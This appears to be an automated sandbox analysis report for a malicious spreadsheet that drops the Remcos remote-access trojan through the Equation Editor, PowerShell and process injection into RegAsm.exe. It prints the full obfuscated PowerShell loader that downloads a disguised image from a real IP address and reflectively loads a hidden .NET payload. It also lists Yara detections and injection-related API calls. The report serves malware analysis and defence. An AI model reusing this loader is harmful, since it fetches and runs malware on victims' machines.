Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('YRClink = SEGhttp://'+'91.92.254.194/'+'imge/new-image_v.jp'+'gSEG; YRCwebClient = New-Object System.Net.WebClient'+'; try { YRCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host SEGFailed To download data from YRClinkSEG -ForegroundColor Red; exi'+'t }; if (YRCdownloadedData -ne YRCnull) { YRCimageText = [System.Text.Encoding]::UTF8.GetString(YR'+'CdownloadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex = YRCimageText.IndexO'+'f(YRCstartFlag); '+'YRCendIndex = YRCimageTe'+'xt.IndexOf(YRCen'+'dFlag); if (YRCstartIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64Length'+' = YRCendIndex '+'- YRCstartIndex; Y'+'RCbase64Command = YRCimageText.Substring(YRCstartIndex, YRCbase64Length); YRCcommandBytes = [System.Convert]::FromBas'+'e64'+'String(YR'+'Cbas'+'e64Command);'+' YRCloadedAssembly = [System.Reflection.Assembly]::Lo'+'ad(YRCcommandBytes); YRCtype = YRCloade'+'dAssembly.GetType(SEGRunPE.'+'HomeSEG); YRCmethod = '+'YRCtype.GetMethod(SEGVAISEG).Invoke(YRCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptth'+'SEG , SEGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new'+'-i'+'mage_v.jpgSE'+'G; YRCwebClient = Ne'+'w-Object System.Net.WebClient; try { YRCdownloadedDa'+'ta = YRCwebCli'+'ent.DownloadData(YRCl'+'ink) } catch { Wri'+'te-Host SEGFailed To download data from YRClinkSEG '+'-ForegroundColor Red; exit }; if (YRCdownloadedData -ne YRCnull) { Y'+'RCim'+'ageText = [System.Text.Encoding]::UTF8.GetString(YRCdownl'+'oadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex '+'= YRCimageText.IndexOf(YRCstartFlag); YRCend'+'In'+'dex = YRCimageText.IndexOf(YRCendFlag)'+'; if (YRCstar'+'tIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64'+'Length = YRCendIndex - YRCstartIndex; YRCbase64Command = YRCimageText.Substr'+'ing(YRCstartIndex, YRCbase64Length); '+'YRCcommandBytes = [System.Convert]::FromBase64String(YRCbase64Command); YRCloadedAssembly = [System.Reflection.Assembly]::Load(YRCcomm'+'andBytes); YRCtype = YRCloadedAssembly.GetType(SEGRunPE'+'.HomeSEG); YRCmethod = YRCtype.GetMethod(SEGVAISEG).Invoke(Y'+'RCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptthSE'+'G , S'+'EGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new-image_v.jpgSEG; YRCwebClient = New-O'+'bject Sys'+'tem.Net.WebClient; try'+' { Y'+'RCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host'+' SEGFailed To download data from '+'YRClinkSEG -ForegroundColor Red; exit }; if ('+'YRCdownloadedData -ne YRCnull) { YRCimageText '+'= [System.Text.Encoding]::UTF8.G'+'et'+'St'+'ring(YRCdownloadedData)'+'; YRCstartFlag = SEG<<B'+'ASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex = YRCimageText.IndexOf(YRCstartFlag); YRCendIndex = YRCimageText.IndexOf(YRCendFlag); if (YRCstartIndex -ge 0 -and YRCendIndex -gt YRCst'+'artIndex)'+' { YRCstartIndex += YRCstartFlag.Length; YRCbase64L'+'ength = YRCendI'+'ndex - YRCs'+'tartIndex; YRCbase64Command = YRCimageText.Substring(YRCstartIndex, YRCbase64Length); YRCcommandByte'+'s = [System.Convert]::FromBase64String(YRCbase64Command); YRCloadedAssembly = [System.Reflection.Assembly]::Load(YRCcom'+'mandBytes); YRCtype = YRCloadedAssembly.GetType(SEGRunPE.HomeSEG); YRCmethod = YRCtype.GetMethod(SEGVAISEG).Invoke(YRCnull, [object[]] (SEGtxt.SSERW/23099/'+'831.6'+'5.232.271//:p'+'tthSEG , SEGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }').RePlACe(([ChaR]89+[ChaR]82+[ChaR]67),[sTRiNG][ChaR]36).RePlACe(([ChaR]83+[ChaR]69+[ChaR]71),[sTRiNG][ChaR]39)\|Iex"
Imagebase:	0x10c0000
File size:	427'008 bytes
MD5 hash:	EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.454028301.0000000003559000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.454028301.0000000003559000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.454028301.0000000003559000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.454028301.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.454028301.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.454028301.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	01:16:47
Start date:	05/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xdd0000
File size:	64'704 bytes
MD5 hash:	8FE9545E9F72E460723F484C304314AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.1043182519.0000000000731000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	moderate
Has exited:	false

Show Windows behavior

VBA Code

Call Graph

Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Sheet1

Declaration

Line	Content
1	Attribute VB_Name = "Sheet1"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: Sheet2

Declaration

Line	Content
1	Attribute VB_Name = "Sheet2"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: Sheet3

Declaration

Line	Content
1	Attribute VB_Name = "Sheet3"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: ThisWorkbook

Declaration

Line	Content
1	Attribute VB_Name = "ThisWorkbook"
2	Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Reset < >

Analysis Process: EQNEDT32.EXEPID: 2544, Parent PID: 564COMMON

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	51%
Total number of Nodes:	51
Total number of Limit Nodes:	4

Executed Functions

Function 005B2916 Relevance: 4.5, APIs: 3, Instructions: 37
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,005B28A4,?,00000000,00000000,?,005AC76F), ref: 005B2918

Part of subcall function 005B292F: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001,?,005AC76F), ref: 005B2956
Part of subcall function 005B292F: ExitProcess.KERNEL32(00000000,?,005B295D,?,005AC76F), ref: 005B296E

Memory Dump Source

Source File: 00000006.00000002.438034337.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, Offset: 005A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5a1000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
Instruction ID: facdf1e257145ed8efa60ef3556994b4293757705fe62d35564e519ba1e13578
Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
Instruction Fuzzy Hash: 3FF0A09164C38129FB23A7B04C9FFEE2E54BFD1B14F54488AB15D590E3E994A884863A

Function 005B2944 Relevance: 3.0, APIs: 2, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001,?,005AC76F), ref: 005B2956

Part of subcall function 005B2969: ExitProcess.KERNEL32(00000000,?,005B295D,?,005AC76F), ref: 005B296E

Memory Dump Source

Source File: 00000006.00000002.438034337.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, Offset: 005A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5a1000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
Instruction ID: 6b205c4046bcf14224e3c92ff5dc9406088c2c04462ae2e20d10882e24e16fa9
Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
Instruction Fuzzy Hash: B201F45964834211EB3076648C4BBFA2F51FB91791FD88887A98C540C6D594B8C3A63E

Function 005B292F Relevance: 3.0, APIs: 2, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.438034337.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, Offset: 005A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5a1000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
Instruction ID: c82382e732f42e52b21e6902d8ffee0037c0bf492bba6fe8b2087116b416609d
Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
Instruction Fuzzy Hash: 8601F42154834221F721B2204C8ABFE6E81FBC2795FA0849BF59C48096D294B9C3963E

Function 005B2879 Relevance: 1.6, APIs: 1, Instructions: 73
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(005B286B), ref: 005B2879

Memory Dump Source

Source File: 00000006.00000002.438034337.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, Offset: 005A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5a1000_EQNEDT32.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9f76444e696193381cfc0bc14944b4c4e61f037473f7944e50f618b099817407
Instruction ID: f747267437bcad6a56a11bbf94d04c6fc0a67776b51d542054ddfe6aaa1ea5ab
Opcode Fuzzy Hash: 9f76444e696193381cfc0bc14944b4c4e61f037473f7944e50f618b099817407
Instruction Fuzzy Hash: 1A21C2A280C7C61FCB1797704D3E651BF603A27104B5CCACFD4D60A8A3E3886151D793

Function 005B2969 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000,?,005B295D,?,005AC76F), ref: 005B296E

Memory Dump Source

Source File: 00000006.00000002.438034337.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, Offset: 005A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5a1000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction Fuzzy Hash:

Function 005B2970 Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.438034337.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, Offset: 005A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5a1000_EQNEDT32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction ID: 0f6a85e9df7c70bb314eb1ae3e744f9fa65187fcaf47bff5592ce248dcc319bd
Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction Fuzzy Hash: 13D052312024028FC304DB08C980E92F36AFFC8321F24C268E0084B62AC330ECD2CAA0

Non-executed Functions

Function 005B27A8 Relevance: 1.6, APIs: 1, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(005B2796), ref: 005B27A8

Memory Dump Source

Source File: 00000006.00000002.438034337.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, Offset: 005A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5a1000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: cf1f48eded46604fcfb4dba31676299a274a09368185e1c3ea0e6a9ebed07cc2
Instruction ID: 879168fed7fdad46d3da588fb039b61d8d59bfaebd741fa9cf936e375b738a96
Opcode Fuzzy Hash: cf1f48eded46604fcfb4dba31676299a274a09368185e1c3ea0e6a9ebed07cc2
Instruction Fuzzy Hash: 1E218BA680D7C11FC71697701ABE495FF607D23600B1DCACFD4E90A8A3E748E656D3A2

Function 005ADCB0 Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.438034337.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, Offset: 005A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5a1000_EQNEDT32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081ea0be6acc3e8e89dd28175023c22977bc3594c74b71c78df82686fa95f6ea
Instruction ID: 305c328e067398101f5e9e18265c121b6f54f47bb56b274f6af05d0d07c29ef8
Opcode Fuzzy Hash: 081ea0be6acc3e8e89dd28175023c22977bc3594c74b71c78df82686fa95f6ea
Instruction Fuzzy Hash: 8581EA8548E3C11FD74393B4582A961BFB12D6716074FC2DFD4C69F9B3E288481AD322

Analysis Process: powershell.exePID: 3196, Parent PID: 3136COMMON

Execution Graph

Execution Coverage:	8.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	157
Total number of Limit Nodes:	4

Executed Functions

Function 004D4CE8 Relevance: 4.6, Strings: 3, Instructions: 808COMMON

Download Yara Rule

Strings

p4, xrefs: 004D54A6
L4, xrefs: 004D5320
(4, xrefs: 004D5170

Memory Dump Source

Source File: 00000009.00000002.453694390.00000000004D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4d0000_powershell.jbxd

Similarity

API ID:
String ID: (4$L4$p4
API String ID: 0-3063766551
Opcode ID: 8681d51935e5c2d23d41bc714448524a0bfcab0b4c7aa020b403e2e9a67994df
Instruction ID: 62923d70ff3d93e148208269e3bb06d08cb3cdaff21c5a3121a4f4525c398616
Opcode Fuzzy Hash: 8681d51935e5c2d23d41bc714448524a0bfcab0b4c7aa020b403e2e9a67994df
Instruction Fuzzy Hash: 56423831B043049FDB119B6888646ABBBF2AFC6311F2484ABD505CB352DF79CC46C7A6

Function 004D0B48 Relevance: 4.1, Strings: 3, Instructions: 367
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

x;4, xrefs: 004D0E33
4:4, xrefs: 004D0BC0
4:4, xrefs: 004D0C25

Memory Dump Source

Source File: 00000009.00000002.453694390.00000000004D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4d0000_powershell.jbxd

Similarity

API ID:
String ID: 4:4$4:4$x;4
API String ID: 0-1205651249
Opcode ID: d4efe9f648488d63190d6818bb07d98dea788ea5a7aac44123d3cd355099694b
Instruction ID: b8d504d3264497cf8afd87f871bc90052671aec2142787765a74b0d810105f87
Opcode Fuzzy Hash: d4efe9f648488d63190d6818bb07d98dea788ea5a7aac44123d3cd355099694b
Instruction Fuzzy Hash: 6AC149317043059FDB259B6484207BBBBE2AFC6310F2484ABD449CB392DB79DD42C766

Function 004D1C60 Relevance: 3.9, Strings: 3, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\94, xrefs: 004D1D65
894, xrefs: 004D1CCC
\94, xrefs: 004D1D96

Memory Dump Source

Source File: 00000009.00000002.453694390.00000000004D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4d0000_powershell.jbxd

Similarity

API ID:
String ID: 894$\94$\94
API String ID: 0-2504921703
Opcode ID: cd04c593a972f4011287a6c85ae2651eda7da0cdf5c95e3ae953aa1f686e6c40
Instruction ID: 33826b0cadc384fb33988476ea71841903fb740617e3ea28b38d271b62abf715
Opcode Fuzzy Hash: cd04c593a972f4011287a6c85ae2651eda7da0cdf5c95e3ae953aa1f686e6c40
Instruction Fuzzy Hash: F5412930B50354AFD7205B64C820B6F7BE69F85700F14845BED59AF3A2CBB5AD01C3A6

Function 004D2A48 Relevance: 2.7, Strings: 1, Instructions: 1420COMMON

Download Yara Rule

Strings

W, xrefs: 004D366C

Memory Dump Source

Source File: 00000009.00000002.453694390.00000000004D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4d0000_powershell.jbxd

Similarity

API ID:
String ID: W
API String ID: 0-655174618
Opcode ID: c2ef44a862ffe2ac87a0868517561783619afd2e195d251fb5efd499f6f16c4c
Instruction ID: bdc99eef90ac52dbfd602ac1bf706aacf549856366c85d591495a12c34f4cac6
Opcode Fuzzy Hash: c2ef44a862ffe2ac87a0868517561783619afd2e195d251fb5efd499f6f16c4c
Instruction Fuzzy Hash: 34A23530B042059FDB159F6488206ABBBF2AFD1311F2484ABD455CB391DB79CE41CBA7

Function 001F9BFC Relevance: 1.8, APIs: 1, Instructions: 347
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001F9ED7

Memory Dump Source

Source File: 00000009.00000002.453588670.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1f0000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: be01ddfee514b2b33712f2fb28fdeb4e694c39f8c127343a6afd85a6b09e63ea
Instruction ID: 16dde515ac1b0ecf0f6c3039529bb9b17f470dc192f1a0edce2caa613c641b9c
Opcode Fuzzy Hash: be01ddfee514b2b33712f2fb28fdeb4e694c39f8c127343a6afd85a6b09e63ea
Instruction Fuzzy Hash: 27C11370D0021D8FDB25DFA4C891BEEBBB1BF49304F1091A9E959B7290DB749A85CF81

Function 001F9C08 Relevance: 1.8, APIs: 1, Instructions: 339
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001F9ED7

Memory Dump Source

Source File: 00000009.00000002.453588670.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1f0000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e60ee1ce95c7a6128aa88d39e40a23985ac1b0efbc68ecab22396d212b4fa167
Instruction ID: 1b725eb9626f1922c01b185c9c10f39379a24c9106f2226441c1b61c0e68c63c
Opcode Fuzzy Hash: e60ee1ce95c7a6128aa88d39e40a23985ac1b0efbc68ecab22396d212b4fa167
Instruction Fuzzy Hash: B9C10370D0021D8FDB25DFA4C891BEEBBB1BF49304F1091A9E959B7290DB749A85CF81

Function 004D45C8 Relevance: 1.8, Strings: 1, Instructions: 584
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

], xrefs: 004D496D

Memory Dump Source

Source File: 00000009.00000002.453694390.00000000004D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4d0000_powershell.jbxd

Similarity

API ID:
String ID: ]
API String ID: 0-3352871620
Opcode ID: f8d1c82685ab4719b7672fda25a10b0f8d4015843efd333902350102f0921d85
Instruction ID: 8ef3cfab8834122e37c3eebc4f81cd1586be8e71f33bf0da45d85683e2596cb8
Opcode Fuzzy Hash: f8d1c82685ab4719b7672fda25a10b0f8d4015843efd333902350102f0921d85
Instruction Fuzzy Hash: 34124534B043548FDB219B6488207ABBBE29FC2310F2484BBD545DB391DB39DD46C7AA

Function 001F9868 Relevance: 1.6, APIs: 1, Instructions: 122
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001F9943

Memory Dump Source

Source File: 00000009.00000002.453588670.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1f0000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 4e166dffa33cbd0adf2a1954207d3469304f631a3a7ad92b2132e3f243d6e45d
Instruction ID: 4bd523b05c599f84d627d7bc3988ec2a8ec72361851c33396ffb362d5748ec1b
Opcode Fuzzy Hash: 4e166dffa33cbd0adf2a1954207d3469304f631a3a7ad92b2132e3f243d6e45d
Instruction Fuzzy Hash: 1341BBB4D002589FDF00DFA9D984AEEFBF1BB49314F20902AE814B7250D779AA45CF64

Function 001F9870 Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001F9943

Memory Dump Source

Source File: 00000009.00000002.453588670.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1f0000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 2d959671681fcb053a8bebe0ab4b8fb0e2ad306a9254d7679dd2bffa615c35bf
Instruction ID: 1833095540ea4ff85045a91f8fc375f39fb69c41eadbd5c18c12529d5e4135c0
Opcode Fuzzy Hash: 2d959671681fcb053a8bebe0ab4b8fb0e2ad306a9254d7679dd2bffa615c35bf
Instruction Fuzzy Hash: ED41ABB4D002589FCF00DFA9D984AEEFBF1BB49314F20902AE814B7250D779AA45CF64

Function 001F9610 Relevance: 1.6, APIs: 1, Instructions: 101
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 001F96C7

Memory Dump Source

Source File: 00000009.00000002.453588670.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1f0000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 280e458cfceac94e6a4ca717d511590a40394978a82d11f5b7c58088279aa5c4
Instruction ID: 8cc4215717c7ebac2c4f826a127ed206cd25916ada015f47fc8ecd32c52df9af
Opcode Fuzzy Hash: 280e458cfceac94e6a4ca717d511590a40394978a82d11f5b7c58088279aa5c4
Instruction Fuzzy Hash: DD41ACB4D002589FDB14DFAAD884AEEBBF1AF49314F24842AE414B7250D778AA45CF94

Function 001F9618 Relevance: 1.6, APIs: 1, Instructions: 96
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 001F96C7

Memory Dump Source

Source File: 00000009.00000002.453588670.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1f0000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c9186d8ba8da419bdb55a724b028465817c63c96b8fca9d95fcef5f540b39629
Instruction ID: 0dffe6ca0272eb5e1f4ad3cec226dfdce85548dc67000c786888dab75126ca7b
Opcode Fuzzy Hash: c9186d8ba8da419bdb55a724b028465817c63c96b8fca9d95fcef5f540b39629
Instruction Fuzzy Hash: 56419EB4D002589FDB14DFAAD984AEEFBB1BF49314F24842AE414B7240D778AA45CF94

Function 001F9521 Relevance: 1.6, APIs: 1, Instructions: 76
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 001F95A6

Memory Dump Source

Source File: 00000009.00000002.453588670.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1f0000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 25e24fb87a038d9d668d84a3c12791e79cbd5d2eea33d265df65abdff7f0b7ea
Instruction ID: 7d2783759541973ad1f61464d8072561ccd482b5854471320d00c873a85f56df
Opcode Fuzzy Hash: 25e24fb87a038d9d668d84a3c12791e79cbd5d2eea33d265df65abdff7f0b7ea
Instruction Fuzzy Hash: CF31CAB4D002189FCF14DFA9D984AEEFBB1AF89314F10942AE815B7350D735A905CF95

Function 001F9528 Relevance: 1.6, APIs: 1, Instructions: 75
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 001F95A6

Memory Dump Source

Source File: 00000009.00000002.453588670.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1f0000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 95ad1ea871917eb548fab9ca60637b4de8edb3f735890f1cd7fb27cc62b6f8c8
Instruction ID: 73949f61638aba3d9b59ff3859a5569b6802f534ad57733f4f6290a5a6ee93aa
Opcode Fuzzy Hash: 95ad1ea871917eb548fab9ca60637b4de8edb3f735890f1cd7fb27cc62b6f8c8
